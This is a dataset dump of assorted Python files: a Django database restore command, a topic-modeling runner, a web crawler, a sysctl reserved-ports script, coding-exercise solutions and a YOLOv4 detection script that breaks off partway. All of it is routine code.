restore_category_submission(category_submission,\n source_db,\n target_db)\n\n if submissionset.rating_id:\n print(\"**Rating {} restoring\".format(submissionset.rating_id))\n rating = Rating.objects.using(source_db).get(\n submissionset=submissionset)\n rating.save(using=target_db)\n print(\"**Rating {} restored\".format(rating.pk))\n\n print(\"*SubmissionSet {} restored\".format(submissionset.pk))\n\n\ndef restore_category_submission(category_submission, source_db, target_db):\n \"\"\"Restores `category_submission` and all related SubcategorySubmissions.\n \"\"\"\n\n print(\"**CategorySubmission {} restoring\".format(\n category_submission.pk))\n category_submission.save(using=target_db)\n\n subcategory_submissions_to_restore = (\n category_submission.subcategorysubmission_set.using(source_db).all())\n for sub_category_submission in subcategory_submissions_to_restore:\n restore_subcategory_submission(sub_category_submission,\n source_db,\n target_db)\n\n print(\"**CategorySubmission {} restored\".format(\n category_submission.pk))\n\n\ndef restore_subcategory_submission(subcategory_submission,\n source_db,\n target_db):\n \"\"\"Restores `subcategory_submission` and all related\n CreditSubmissions.\n\n \"\"\"\n\n print(\"***SubCategorySubmission {} restoring\".format(\n subcategory_submission.pk))\n subcategory_submission.save(using=target_db)\n\n credit_user_submissions_to_restore = (\n subcategory_submission.creditusersubmission_set.using(\n source_db).all())\n for credit_user_submission in credit_user_submissions_to_restore:\n restore_credit_user_submission(credit_user_submission,\n source_db,\n target_db)\n\n print(\"***SubCategorySubmission {} restored\".format(\n subcategory_submission.pk))\n\n\ndef restore_credit_user_submission(credit_user_submission,\n source_db,\n target_db):\n \"\"\"Restores `credit_user_submission` and all related\n DocumentationFieldSubmissions.\n\n \"\"\"\n\n print(\"****CreditUserSubmission {} restoring\".format(\n credit_user_submission.pk))\n credit_user_submission.save(using=target_db,\n calculate_points=False)\n\n credit_user_submission = CreditUserSubmission.objects.using(\n source_db).get(pk=credit_user_submission.pk)\n\n documentation_field_submissions_to_restore = (\n get_documentation_field_submissions(\n credit_user_submission=credit_user_submission,\n source_db=source_db))\n\n for documentation_field_submission in (\n documentation_field_submissions_to_restore):\n\n restore_documentation_field_submission(\n documentation_field_submission=documentation_field_submission,\n source_db=source_db,\n target_db=target_db)\n\n print(\"****CreditUserSubmission {} restored\".format(\n credit_user_submission.pk))\n\n\ndef restore_documentation_field_submission(\n documentation_field_submission,\n source_db,\n target_db):\n\n print(\"*****DocumentationFieldSubmission {} restoring\".format(\n documentation_field_submission.pk))\n\n documentation_field_submission.save(using=target_db)\n\n print(\"*****DocumentationFieldSubmission {} restored\".format(\n documentation_field_submission.pk))\n\n\ndef restore_subscription(subscription,\n source_db,\n target_db):\n \"\"\"Restores `subscription` and all related SubscriptionPayments.\n\n \"\"\"\n\n print(\"****Subscription {} restoring\".format(subscription.pk))\n subscription.save(using=target_db)\n\n for subscription_payment in subscription.subscriptionpayment_set.all():\n print(\"*****SubscriptionPayment {} restoring\".format(\n subscription_payment.pk))\n subscription_payment.save(using=target_db, subscription=subscription)\n print(\"*****SubscriptionPayment {} restored\".format(\n subscription_payment.pk))\n\n print(\"****Subscription {} restored\".format(\n subscription.pk))\n\n\ndef restore_only_document_field_submissions(institution,\n source_db=\"stars-backup\",\n target_db=\"default\"):\n submissionsets = Institution.objects.using(\n source_db).get(\n pk=institution.pk).submissionset_set.all()\n\n for submissionset in submissionsets:\n\n if not SubmissionSet.objects.using(target_db).filter(\n pk=submissionset.pk).count():\n continue\n\n category_submissions_to_restore = (\n submissionset.categorysubmission_set.using(source_db).all())\n for category_submission in category_submissions_to_restore:\n\n subcategory_submissions_to_restore = (\n category_submission.subcategorysubmission_set.using(source_db).all()) # noqa\n for subcategory_submission in subcategory_submissions_to_restore:\n\n credit_user_submissions_to_restore = (\n subcategory_submission.creditusersubmission_set.using(\n source_db).all())\n for credit_user_submission in (\n credit_user_submissions_to_restore):\n\n # First, clear any documentation_field_submissions for this\n # credit_user_submission from the target db.\n documentation_field_submissions_to_clear = (\n get_documentation_field_submissions(\n credit_user_submission=credit_user_submission,\n source_db=target_db))\n for documentation_field_submission in (\n documentation_field_submissions_to_clear):\n documentation_field_submission.delete()\n\n documentation_field_submissions_to_restore = (\n get_documentation_field_submissions(\n credit_user_submission=credit_user_submission,\n source_db=source_db))\n\n for documentation_field_submission in (\n documentation_field_submissions_to_restore):\n\n restore_documentation_field_submission(\n documentation_field_submission=documentation_field_submission,\n source_db=source_db,\n target_db=target_db)\n","sub_path":"stars/apps/institutions/management/commands/restore_institution.py","file_name":"restore_institution.py","file_ext":"py","file_size_in_byte":13135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"108294792","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport datetime\nimport functools\nimport logging\nimport os\nimport os.path\nimport pickle\nimport sys\nimport subprocess\n\nFORMAT = \"%(asctime)s %(levelname)8s:[%(filename)s:%(lineno)s - %(funcName)20s()] %(message)s\"\nlogging.basicConfig(level=logging.DEBUG,\n format=FORMAT,\n datefmt='%m-%d %H:%M:%S',\n filename='./idea_relations.log',\n filemode='w')\n\nimport dateutil.parser\n\nimport fighting_lexicon as fl\nimport idea_relations_runner as il\nimport mallet_topics as mt\nimport output_analyzer\nimport preprocessing\n\nis_windows = os.name == 'nt'\n\nSTEPS = 4\n\n\ndef parse_arguments(args):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--option\", type=str, choices=[\"topics\", \"keywords\"],\n help=(\"choose using topics or keywords to represent ideas,\"\n \" mallet_bin_dir is required if topic is chosen,\"\n \" background_file is required if keywords is chosen.\"),\n default=\"topics\")\n parser.add_argument(\"--input_file\",\n help=(\"input file, each line is a json object \"\n \"with fulldate and text\"),\n type=str)\n parser.add_argument(\"--data_output_dir\",\n help=(\"output directory for intermedia data\"),\n type=str)\n parser.add_argument(\"--final_output_dir\",\n help=(\"output directory for final results\"),\n type=str)\n parser.add_argument(\"--mallet_bin_dir\",\n help=(\"directory with Mallet binaries\"),\n type=str)\n parser.add_argument(\"--background_file\",\n help=(\"background file to learn important keywords\"),\n type=str)\n parser.add_argument(\"--group_by\",\n help=(\"binning option for timesteps, supports year, quarter, and month\"),\n type=str,\n default=\"year\")\n parser.add_argument(\"--prefix\",\n help=(\"name for the exploration\"),\n type=str,\n default=\"exp\")\n parser.add_argument(\"--num_ideas\",\n help=(\"number of ideas, i.e., \"\n \"number of topics or keywords\"),\n type=int,\n default=50)\n parser.add_argument(\"--tokenize\",\n help=(\"whether to tokenize\"),\n action=\"store_true\")\n parser.add_argument(\"--lemmatize\",\n help=(\"whether to lemmatize\"),\n action=\"store_true\")\n parser.add_argument(\"--nostopwords\",\n help=(\"whether to filter stopwords\"),\n action=\"store_true\")\n\n parser.add_argument(\"--objects_location\",\n help=(\"File name to store graph data in.\"\n \"If not given, no data will be stored\"),\n type=str,\n default=None)\n parser.add_argument(\"--no_create_graphs\",\n help=(\"whether to create graphs of relations\"),\n action=\"store_true\")\n parser.add_argument(\"--force_create_topics\",\n help=(\"force the parser to recreate topic information instead of relying on existing files\"),\n action=\"store_true\")\n parser.add_argument(\"--start_time\",\n help=(\"Only consider documents from after this point in time\"),\n type=str,\n default=datetime.MINYEAR)\n parser.add_argument(\"--end_time\",\n help=(\"Only consider documents from before this point in time\"),\n type=str,\n default=datetime.MAXYEAR)\n\n return parser.parse_args(args=args)\n\n\ndef main(args=None, message_queue=None):\n args = parse_arguments(args)\n\n is_subprocess = args.objects_location is not None and message_queue is not None\n if is_subprocess: message_queue.put(\"Status:%d\" % STEPS)\n\n input_file = os.path.abspath(args.input_file)\n data_output_dir = os.path.abspath(args.data_output_dir)\n final_output_dir = os.path.abspath(args.final_output_dir)\n if not os.path.exists(data_output_dir):\n os.makedirs(data_output_dir)\n if not os.path.exists(final_output_dir):\n os.makedirs(final_output_dir)\n # Support some standard preprocessing\n if args.tokenize:\n # tokenize input_file to token_file\n logging.info(\"tokenizing data\")\n token_file = \"%s/tokens.jsonlist.gz\" % data_output_dir\n func = functools.partial(preprocessing.tokenize,\n filter_stopwords=args.nostopwords)\n preprocessing.preprocess_input(input_file, token_file)\n input_file = token_file\n\n # status message\n if is_subprocess: message_queue.put(\"Status:1\")\n\n if args.lemmatize:\n # lemmatize input_file to lemma_file\n logging.info(\"lemmatizing data\")\n lemma_file = \"%s/lemmas.jsonlist.gz\" % data_output_dir\n func = functools.partial(preprocessing.lemmatize,\n filter_stopwords=args.nostopwords)\n preprocessing.preprocess_input(input_file, lemma_file)\n input_file = lemma_file\n\n # status message\n if is_subprocess: message_queue.put(\"Status:2\")\n\n # generate topics or lexicons\n option = args.option\n num_ideas = args.num_ideas\n cooccur_func = functools.partial(il.generate_cooccurrence_from_int_set,\n num_ideas=num_ideas)\n prefix = args.prefix\n if option == \"topics\":\n logging.info(\"using topics to represent ideas\")\n prefix = \"%s_topics\" % prefix\n\n # generate mallet topics\n if args.force_create_topics or not mt.check_mallet_directory(data_output_dir):\n mt.get_mallet_input_from_words(input_file, data_output_dir)\n # run mallet to prepare topics inputs\n # users can also generate mallet-style topic inputs inputs\n logging.info(\"running mallet to get topics\")\n if not os.path.exists(os.path.join(args.mallet_bin_dir, 'mallet')):\n sys.exit(\"Error: Unable to find mallet at %s\" % args.mallet_bin_dir)\n if is_windows:\n path = '.\\mallet.bat'\n if not os.path.isfile(path):\n path = '.\\idea_relations\\mallet.bat'\n if not os.path.isfile(path):\n raise FileNotFoundError(\"Couldn't locate mallet.bat\")\n\n subprocess.call(\"%s %s %s %d\" % (path, args.mallet_bin_dir, data_output_dir, num_ideas),\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n else:\n path = './mallet.sh'\n if not os.path.isfile(path):\n path = './idea_relations/mallet.sh'\n if not os.path.isfile(path):\n raise FileNotFoundError(\"Couldn't locate mallet.bat\")\n\n subprocess.call(\"%s %s %s %d\" % (path, args.mallet_bin_dir, data_output_dir, num_ideas),\n shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n\n # load mallet outputs\n articles, vocab, idea_names = mt.load_articles(input_file, data_output_dir)\n table_top = 5\n elif option == \"keywords\":\n logging.info(\"using keywords to represent ideas\")\n prefix = \"%s_keywords\" % prefix\n # idenfity keyword ideas using fighting lexicon\n lexicon_file = \"%s/fighting_lexicon.txt\" % data_output_dir\n other_files = [args.background_file]\n fl.get_top_distinguishing(input_file, other_files, data_output_dir,\n lexicon_file)\n # load keywords\n articles, word_set, idea_names = fl.load_word_articles(input_file,\n lexicon_file,\n data_output_dir,\n vocab_size=num_ideas)\n table_top = 10\n else:\n logging.error(\"unsupported idea representations\")\n\n if is_subprocess: message_queue.put(\"Status:3\")\n\n default_time = datetime.datetime(1, 1, 1)\n\n start = dateutil.parser.parse(str(args.start_time), default=default_time)\n end = dateutil.parser.parse(str(args.end_time), default=default_time)\n\n if is_subprocess:\n # Output for the visualizer\n\n data = output_analyzer.get_output(args, articles, idea_names, cooccur_func, name=args.prefix,\n group_by=args.group_by, start_time=start, end_time=end)\n # Output data is a tuple of the form: (pmi, ts_correlation, ts_matrix, idea_names)\n pickle.dump(data, open(args.objects_location, 'wb'))\n\n message_queue.put(\"Status:4\")\n\n if not args.no_create_graphs:\n logging.info(\"Creating graphs\")\n # compute strength between pairs and generate outputs\n il.generate_all_outputs(articles, num_ideas, idea_names, prefix,\n final_output_dir, cooccur_func,\n table_top=table_top, group_by=args.group_by)\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107488555","text":"import json\nfrom os import path\n\n\ndef num_class(df, predict_attr, treatment_attr):\n \"\"\"\n Returns the number of Responders and Non-responders in Treatment and Control group\n \"\"\"\n tr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 1)] # Responders in Treatment group\n tn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 1)] # Non-responders in Treatment group\n cr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 0)] # Responders in Control group\n cn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 0)] # Non-responders in Control group\n return tr.shape[0], tn.shape[0], cr.shape[0], cn.shape[0]\n\n\ndef split_class(df, predict_attr, treatment_attr):\n tr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 1)] # Responders in Treatment group\n tn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 1)] # Non-responders in Treatment group\n cr = df[(df[predict_attr] != 0) & (df[treatment_attr] == 0)] # Responders in Control group\n cn = df[(df[predict_attr] == 0) & (df[treatment_attr] == 0)] # Non-responders in Control group\n return tr, tn, cr, cn\n\n\ndef save_json(name, data):\n with open('output/' + name + '.json', 'w') as f:\n json.dump(data, f)\n\n\ndef load_json(name):\n filename = 'output/' + name + '.json'\n if path.exists(filename):\n with open(filename, 'r') as f:\n print('Open success:', filename)\n return json.load(f)\n else:\n print('Not exist', filename)\n return None\n\n\ndef ty_assign(y, t):\n if y == 1 and t == 1:\n return \"TR\"\n elif y == 0 and t == 1:\n return \"TN\"\n elif y == 1 and t == 0:\n return \"CR\"\n elif y == 0 and t == 0:\n return \"CN\"\n else:\n return None\n\n\ndef t_assign(ty):\n if ty in (\"TR\", \"TN\"):\n return 1\n elif ty in (\"CR\", \"CN\"):\n return 0\n else:\n return None\n\n\ndef y_assign(ty):\n if ty in (\"TR\", \"CR\"):\n return 1\n elif ty in (\"TN\", \"CN\"):\n return 0\n else:\n return None\n\n\ndef normalize(input_df, refer_vars=None):\n df = input_df.copy()\n normalize_vars = {}\n\n for col in df.columns:\n if refer_vars:\n min_max = normalize_vars.get(col)\n if min_max is None:\n continue\n min_val, max_val = min_max\n else:\n count = df[col].drop_duplicates().count()\n if count < 2:\n continue\n min_val = df[col].min()\n max_val = df[col].max()\n normalize_vars[col] = (min_val, max_val)\n\n df[col] = (df[col] - min_val) / (max_val - min_val)\n\n return df, normalize_vars\n\n\ndef denormalize(input_df, normalize_vars):\n df = input_df.copy()\n\n for col in df.columns:\n min_max = normalize_vars.get(col)\n if min_max is None:\n continue\n\n min_val, max_val = min_max\n df[col] = df[col] * (max_val - min_val) + min_val\n\n return df\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528592290","text":"'''\nCrie um programa que encontre a letra que mais se repetiu em uma sentença\n'''\n'''\ndef whosMost(s):\n cont = list()\n letras = []\n for l in s.lower().replace(' ', ''):\n if l in letras:\n cont[letras.index(l)] += 1\n else:\n letras.append(l)\n cont.append(1)\n del letras[len(letras)-1]; del cont[len(cont)-1]\n return print('A letra que mais se repete é a {} e ela se repete {} vezes'.format(letras[cont.index(max(cont))].upper(), max(cont)))\n\nwhosMost(str('How do you do?'))\n'''\ns = 'How do you do?'\ncont = list()\nletras = []\nfor l in s.lower().replace(' ', ''):\n if l in letras:\n letras[letras.index(l) + 1] += 1\n else:\n letras.append(l)\n letras.append(1)\nprint(letras)\n\n","sub_path":"ExercisesPython/mostwanted.py","file_name":"mostwanted.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196206533","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nPE_0112\n\nBouncy numbers\n\nCreated on Mon Oct 10 12:12:07 2016\n@author: mbh\n\"\"\"\n\nimport time\nimport itertools as it\n\n#mine -about 7 s.\ndef p112(p): \n t=time.clock()\n bouncy=0\n for n in it.count():\n ns=[int(x) for x in str(n)]\n if all(x>=y for x, y in zip(ns, ns[1:])) or all(x<=y for x, y in zip(ns, ns[1:])):\n continue\n bouncy+=1\n if bouncy/n==p:break\n print(n,time.clock()-t)\n\n#from hansaplast - about 2.6 s\ndef hansaplast(p):\n t=time.clock()\n i,b=100,0\n while b/i < p:\n \ti,s,ss = i+1,str(i+1),\"\".join(sorted(str(i+1)))\n \tb = b if s == ss or s == ss[::-1] else b+1\n print(i,time.clock()-t)\n\n \n#from Stack exchange user 6502 \n#http://stackoverflow.com/questions/4983258/python-how-to-check-list-monotonicity\ndef strictly_increasing(L):\n return all(xy for x, y in zip(L, L[1:]))\n \ndef non_increasing(L):\n# return all(x>=y for x, y in zip(L, L[1:]))\n for i in range(len(L)-1):\n if L[i+1]-L[i]>0:\n return False\n return True\n \ndef non_decreasing(L):\n# return all(x<=y for x, y in zip(L, L[1:]))\n for i in range(len(L)-1):\n if L[i+1]-L[i]<0:\n return False\n return True\n \nimport time\ndef p112v2(p): \n t=time.clock()\n xs=0\n n=0\n while n<15:\n xi,xd=0,0 \n n+=1\n for x in range(10):\n if x>0:\n xi=hi(x,n)\n xd=di(x,n)\n xs+=xi+xd\n if 1-(xs-10*n)/(10**n-1)>=p:\n print(n,xs-10*n,1-(xs-10*n)/(10**n))\n break\n \n nmin=10**(n-1)\n nmax=10**(n)\n ntry=3*10**(n-1)\n \n \n\n\ndef hi(x,n,memo={}):\n if x==1:\n return 1\n if x==2:\n return n\n if n==1:\n return 1\n if n==2:\n return x\n try:\n return memo[(x,n)]\n except KeyError:\n result=hi(x,n-1,memo)+hi(x-1,n,memo)\n memo[(x,n)]=result\n return result\n\ndef di(x,n,memo={}):\n if x==9:\n return 1\n if x==8:\n return n\n if n==1:\n return 1\n if n==2:\n return 10-x\n try:\n return memo[(x,n)]\n except KeyError:\n result=di(x,n-1,memo)+di(x+1,n,memo)\n memo[(x,n)]=result\n return result ","sub_path":"PE_0112/PE_0112.py","file_name":"PE_0112.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"456171706","text":"from django.conf.urls import url\nfrom django.urls import include\nfrom django.views.generic import RedirectView\nfrom django.contrib.gis import admin\n\nfrom django.contrib.staticfiles import views as staticviews\n\nfrom cms import views as cms_views\nfrom destinations import views as dest_views\n\nfrom django.conf import settings\n\nurlpatterns = [\n # Home view, which is also the directions and explore views\n url(r'^$', dest_views.home, name='home'),\n url(r'^explore$', dest_views.explore, name='explore'),\n\n # App manifest and service worker for PWA app\n url('^manifest.json$', dest_views.manifest),\n url('^service-worker.js$', dest_views.service_worker),\n\n # Privacy policy and ToS\n url(r'^privacy_policy$', dest_views.privacy_policy, name='privacy_policy'),\n url(r'^terms_of_service$', dest_views.terms_of_service, name='terms_of_service'),\n\n # User destination flags\n url(r'^api/user_flag/', dest_views.UserFlagView.as_view()),\n\n # Map\n url(r'^api/destinations/search$', dest_views.SearchDestinations.as_view(),\n name='api_destinations_search'),\n url(r'^map/reachable$', dest_views.FindReachableDestinations.as_view(), name='reachable'),\n\n # Handle pre-redesign URLs by redirecting\n url(r'^(?:map/)?directions/', RedirectView.as_view(pattern_name='home', query_string=True,\n permanent=True)),\n\n # Places\n url(r'^place/(?P[\\d-]+)/$', dest_views.place_detail, name='place-detail'),\n\n # Events\n url(r'^event/(?P[\\d-]+)/$', dest_views.event_detail, name='event-detail'),\n\n # Tours\n url(r'^tour/(?P[\\d-]+)/$', dest_views.tour_detail, name='tour-detail'),\n\n # About (no more FAQ)\n url(r'^(?Pabout)/$', cms_views.about_faq, name='about'),\n\n # All Published Articles\n url(r'^api/articles$', cms_views.AllArticles.as_view(), name='api_articles'),\n\n # Community Profiles\n url(r'^learn/$', cms_views.learn_list, name='learn-list'),\n url(r'^learn/(?P[\\w-]+)/$', cms_views.learn_detail, name='learn-detail'),\n\n # Link Shortening\n url(r'^link/', include('shortlinks.urls', namespace='shortlinks')),\n\n url(r'^admin/', admin.site.urls),\n]\n\nif settings.DEBUG:\n urlpatterns += [\n url(r'^static/(?P.*)$', staticviews.serve),\n ]\n","sub_path":"python/cac_tripplanner/cac_tripplanner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"366215374","text":"#URL: https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\n#Description\n\"\"\"\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\nYou want to maximize your profit by choosing a single day to buy one stock and choosing a different \nday in the future to sell that stock.\nReturn the maximum profit you can achieve from this transaction. If you cannot achieve any profit, \nreturn 0.\n\n\nExample 1:\n\nInput: prices = [7,1,5,3,6,4]\nOutput: 5\nExplanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.\nNote that buying on day 2 and selling on day 1 is not allowed because you must buy before you sell.\n\n\nExample 2:\n\nInput: prices = [7,6,4,3,1]\nOutput: 0\nExplanation: In this case, no transactions are done and the max profit = 0.\n\n\nConstraints:\n\n1 <= prices.length <= 105\n0 <= prices[i] <= 104\n\"\"\"\ndef maxProfit(prices):\n sz = len(prices)\n beg = 0\n end = 1\n max_profit = 0\n while end < sz:\n if prices[end] > prices[beg]:\n diff = prices[end] - prices[beg]\n if diff > max_profit:\n max_profit = diff\n else:\n beg = end\n end += 1\n return max_profit\n\n","sub_path":"leetcode/dp/max_profit.py","file_name":"max_profit.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"218120198","text":"#BEGIN HEADER\n#############/Functor Code\\#############\n#END HEADER\n\n\ndef getOutputCalledFunction(self,*Args,**Kwargs):\n\t'''\n\t\tCall recursively a list of Functions for a list of Args\n\t'''\n\t\"\"\"\n\t\tdef add(x,y):\n\t\t\treturn x+y;\n\t\tdef multiply(x,y):\n\t\t\treturn x*y;\n\n\t\t#Get a Functor\n\t\tFunctor=_.getInstanceWithName(\"Functor\")+{'CalledFunctionsList':[add,multiply]};\n\n\t\t#Init the recursive Call\n\t\tFunctor.CalledFunctionIdx=0;\n\t\tprint('Final Output is : '+str(reduce(Functor.getOutputCalledFunction,[1,2],0)));\n\t\"\"\"\n\t\n\t#Debug\n\tsys.modules['SysPyModule'].printDebug('Start');\n\t\t\n\t#Check that the Idx is correct\n\tif self.CalledFunctionIdx0:\n\t\n\t\t#Init the Idx\n\t\tself.CalledFunctionIdx=0;\n\t\t\n\t\t#Scan the CalledFunctionsList\n\t\twhile self.CalledFunctionIdx\")\n HOMEPAGE = input(\"Give web page>\")\n #sys.stderr.write(\"E: Usage \" + arglist[0] + \" \")\n #sys.stderr.flush()\n #exit(2)\n\nelse:\n PROJECT_NAME = arglist[1]\n HOMEPAGE = arglist[2] #'http://yle.fi/'\n\nDOMAIN_NAME = get_domain_name(HOMEPAGE)\nWAITING_LIST_FILE = PROJECT_NAME + '/queue.txt'\nCRAWLED_FILE = PROJECT_NAME + '/crawled.txt'\nNUMBER_OF_SPIDERS = 8\nqueue = Queue()\nSpider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)\n\n\ndef work():\n while True:\n url = queue.get()\n Spider.crawl_page(threading.current_thread().name, url)\n queue.task_done()\n\n\n\ndef create_spiders():\n for _ in range(NUMBER_OF_SPIDERS):\n t = threading.Thread(target=work)\n t.daemon = True\n t.start()\n\n\ndef create_jobs():\n for link in file_to_set(WAITING_LIST_FILE):\n queue.put(link)\n queue.join()\n crawl()\n\n\ndef crawl():\n links = file_to_set(WAITING_LIST_FILE)\n if len(links)>0:\n print(str(len(WAITING_LIST_FILE)) + ' links to waiting list')\n create_jobs()\n\n\n\n\ncreate_spiders()\ncrawl()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"271203860","text":"# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.\n#\nimport commands\nimport sys\n\n\n\ndef main(args_str=None):\n\n ports_str = sys.argv[1]\n\n status, output = commands.getstatusoutput(\"cat /proc/sys/net/ipv4/ip_local_reserved_ports\")\n if status != 0:\n sys.exit(-1)\n else:\n existing_ports = output\n\n status, output = commands.getstatusoutput(\"sysctl -w net.ipv4.ip_local_reserved_ports=%s,%s\" % (ports_str, existing_ports))\n\n if status != 0:\n sys.exit(-1)\n\n status, output = commands.getstatusoutput(\"grep '^net.ipv4.ip_local_reserved_ports' /etc/sysctl.conf > /dev/null 2>&1\")\n\n\n if status != 0: \n status, output = commands.getstatusoutput('echo \"net.ipv4.ip_local_reserved_ports = %s\" >> /etc/sysctl.conf' % ports_str)\n else:\n status, output = commands.getstatusoutput(\"sed -i 's/net.ipv4.ip_local_reserved_ports\\s*=\\s*/net.ipv4.ip_local_reserved_ports=%s,/' /etc/sysctl.conf\" % ports_str)\n\n if status != 0:\n sys.exit(-1)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"Dockerfiles/dns/modules/contrail.old/files/add_reserved_ports.py","file_name":"add_reserved_ports.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"284585034","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport sys\nimport cv2\nimport copy\nimport math\nimport glob\nimport time\nimport argparse\nimport colorsys\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\nfrom model.yolov4 import Yolov4\nfrom model.yolov4_tiny import Yolov4_tiny\n\nfrom utils.anchors import yolo_anchors\n\nfrom utils.postprocess import postprocess\nfrom utils.nms import yolov4_nms\n\n\n# In[ ]:\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description='Simple detection script for using ScaledYOLOv4.')\n parser.add_argument('--model_type', default='tiny',help=\"choices=['tiny','p5','p6','p7']\")\n parser.add_argument('--image_directory', default='./image_directory')\n parser.add_argument('--img_save_path', default='./lossvsepoch_img_save_path')\n parser.add_argument('--checkpoint_dir', default='./checkpoint_dir')\n parser.add_argument('--class_names', default='class_names.names',help=\"voc.names\")\n parser.add_argument('--optimizer', default='Adam', help=\"choices=[Adam,sgd]\")\n parser.add_argument('--fixed_scale_bool', default='False', type=bool,help=\"choices=[True,False]\")\n parser.add_argument('--fixed_scale', default=608, type=int)\n parser.add_argument('--detect_img_size', default=608, type=int)\n parser.add_argument('--drop_block', default='False', help=\"choices=[True,False]\")\n parser.add_argument('--scales_x_y', default=[2., 2., 2., 2., 2.])\n parser.add_argument('--nms', default='diou_nms', help=\"choices=['diou_nms','hard_nms']\")\n parser.add_argument('--nms_max_box_num', default=100, type=int)\n parser.add_argument('--nms_iou_threshold', default=0.20, type=float)\n parser.add_argument('--nms_score_threshold', default=0.25, type=float)\n parser.add_argument('--save_method', default='.ckpt', help=\"choices=['.ckpt','h5']\")\n \n return parser.parse_args(args) \n\n\n# In[8]:\n\n\ndef detect_batch_img(img,model,args):\n\n pred = model.predict(img)\n pre_nms_decoded_boxes,pre_nms__scores = postprocess(pred,args)\n pre_nms_decoded_boxes = pre_nms_decoded_boxes.numpy()\n pre_nms__scores = pre_nms__scores.numpy()\n boxes, scores, classes, valid_detections = yolov4_nms(args)(pre_nms_decoded_boxes, pre_nms__scores, args)\n\n return boxes, scores, classes, valid_detections\n\n\n# In[9]:\n\n\ndef main(args):\n \n f = open(args.class_names)\n labels = f.read().splitlines()\n class_num = len(labels)\n \n if args.model_type == \"tiny\":\n print('tiny activated')\n model = Yolov4_tiny(args, training=True)\n \n elif args.model_type == \"p5\":\n model = Yolov4(args, training=True)\n \n elif args.model_type == \"p6\":\n model = Yolov4(args, training=True)\n \n else:\n model = Yolov4(args, training=True)\n \n # optimizer\n if args.optimizer == 'Adam':\n optimizer = tf.keras.optimizers.Adam()\n elif args.optimizer == 'sgd':\n optimizer = tf.keras.optimizers.SGD()\n \n if args.save_method == '.ckpt':\n root = tf.train.Checkpoint(optimizer=optimizer,model=model)\n manager = tf.train.CheckpointManager(root,args.checkpoint_dir, max_to_keep=3)\n print(manager.checkpoints)\n root.restore(manager.latest_checkpoint).expect_partial()\n elif args.save_method == '.h5':\n file_paths = os.listdir(args.checkpoint_dir)\n\n if len(file_paths) == 0:\n print('No h5 in folder')\n else:\n for File in file_paths:\n if File.endswith(\".h5\"):\n model.load_weights(args.checkpoint_dir + '\\yolo.h5',by_name=True, skip_mismatch=True)\n print('Restored from .h5')\n \n hsv_tuples = [(1.0 * x / class_num, 1., 1.) for x in range(class_num)]\n colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n colors = list(map(lambda x: (int(x[0] * 255.), int(x[1] * 255.), int(x[2] * 255.)), colors))\n \n if args.fixed_scale_bool == True:\n input_size = args.fixed_scale\n else:\n input_size = args.detect_img_size\n \n files=glob.glob(args.image_directory + '\\*.jpg')\n for i in range(len(files)):\n start=time.time()\n base_name = os.path.basename(files[i])\n \n x_img_string = tf.io.read_file(files[i])\n original_image = tf.io.decode_jpeg(x_img_string, channels=3)\n original_image = tf.image.convert_image_dtype(original_image, tf.float32)\n org_h,org_w,_ = original_image.shape\n resize_ratio = min(input_size / org_w, input_size / org_h)\n image_resize = tf.image.resize_with_pad(image = original_image,target_height = input_size,\n target_width = input_size)\n\n \n resize_ratio_tile = np.tile([resize_ratio],4) \n image_resize_shape = image_resize.shape\n image_data =np.expand_dims(image_resize, axis=0)\n \n #converted to numpy for the purpose of plotting boxes\n original_image_ny = original_image.numpy()*255\n \n boxes,scores,classes,valid_detections = detect_batch_img(image_data, model,args)\n\n batch_index = 0\n valid_boxes = (boxes[batch_index][0:valid_detections[batch_index]]) * image_resize_shape[0]\n valid_boxes = valid_boxes/resize_ratio_tile\n valid_classes = classes[batch_index][0:valid_detections[batch_index]]\n valid_scores = scores[batch_index][0:valid_detections[batch_index]]\n \n count_detected = valid_boxes.shape[0]\n for i in range(count_detected):\n box = 